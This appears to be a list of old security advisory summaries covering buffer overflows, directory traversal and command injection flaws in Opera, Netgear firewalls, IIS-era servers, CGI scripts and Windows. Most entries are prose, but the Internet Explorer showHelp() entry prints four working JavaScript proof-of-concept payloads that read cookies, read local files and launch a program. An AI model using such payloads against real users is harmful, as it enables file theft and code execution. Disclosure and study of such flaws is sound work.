The Opera browser for Win32 (and possibly other) systems is prone to a remotely exploitable buffer overflow condition. For security purposes, Opera will display a warning any time a user of the client visits a link containing a username as part of the URI. An excessively long username will trigger a buffer overflow condition related to this security feature that may overwrite the stack frame of the affected function. Attackers may exploit this vulnerability to execute instructions on client systems.
Netgear FM114P Wireless Firewalls are vulnerable to directory traversal attacks. An unauthenticated user can escape from the /upnp/service directory and retrieve the firewall's configuration file by sending a specially crafted HTTP request to the vulnerable device.
By passing an overly large string when invoking nethack, it is possible to corrupt memory. By exploiting this issue it may be possible for an attacker to overwrite values in sensitive areas of memory, resulting in the execution of arbitrary attacker-supplied code. As nethack may be installed setgid 'games' on various systems this may allow an attacker to gain elevated privileges.
It has been reported that the HPUX wall executable may be prone to a buffer overflow condition. This buffer overflow is alleged to be triggered when an excessive amount of data is redirected into wall as a message intended to be broadcast. It may be possible for remote attackers to corrupt sensitive regions of memory with attacker-supplied values, possibly resulting in execution of arbitrary code.
It has been reported that iPlanet Web Server and Netscape Enterprise Server are prone to a remotely exploitable buffer overflow condition. This is due to insufficient bounds checking when handling HTTP requests. This condition is reportedly triggered when an invalid HTTP 'method name' or URI request is handled by the vulnerable server. It is possible for remote attackers to corrupt sensitive regions of memory with attacker-supplied values, possibly resulting in execution of arbitrary code. Code execution will occur in the security context of the vulnerable web server process.
This is an exploit for a vulnerability in Microsoft Windows CanonicalizePathName() which allows for a remote shell at port 54321 of the victim. It works against Windows XP SP1 and should give a crash on Win2k in services.exe.
FileSeek.cgi and FileSeek2.cgi are prone to a file disclosure vulnerability. It is possible for a remote attacker to submit a maliciously crafted web request which is capable of breaking out of the wwwroot directory and browsing arbitrary web-readable files on a host running the vulnerable script.
FileSeek.cgi and FileSeek2.cgi do not filter shell metacharacters from web requests. As a result, it is possible for a remote attacker to execute commands on the shell of a host running the vulnerable script. Commands will be executed with the privileges of the webserver process.
Microsoft Internet Explorer implements the showHelp() function as a means of displaying help content contained in HTML pages. However, this function is capable of performing too many other actions outside of its intended functionality through pluggable protocols. These actions could include reading files and executing commands on the vulnerable system. Exploit 1: // Sandblad advisory #11 - Read your google cookie showHelp("file:");showHelp("http://www.google.com/"); showHelp("javascript:alert(document.cookie)"); Exploit 2: // Sandblad advisory #11 - Read the file c:test.txt showHelp("file:");showHelp("res://shdoclc.dll/about.dlg"); showHelp("javascript:try{c=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){c=new ActiveXObject('Microsoft.XMLHTTP')};c.open('GET','file://c:/test.txt',false);c.send(null);alert(c.responseText)"); Exploit 3: // Sandblad advisory #11 - Read the file c:test.txt showHelp("file:");showHelp("file://c:/test.txt"); showHelp("javascript:alert(document.body.innerText)"); Exploit 4: // Sandblad advisory #11 - Run the very nice game Winmine showHelp("file:");showHelp("iexplore.chm");showHelp("res:"); showHelp("javascript:location='mk:@MSITStore:C:'"); showHelp("javascript:document.write('<object id=c classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11\u003E<param name=Command value=ShortCut\u003E<param name=Item1 value=,winmine,\u003E</object\u003E');c.Click();");
A buffer overrun vulnerability exists in the Microsoft Windows XP Redirector due to improper handling of certain parameters passed to it. If one of these parameters is unusually long, a buffer can be overrun, resulting in either Windows XP crashing or code execution with elevated privileges.
Services By CQR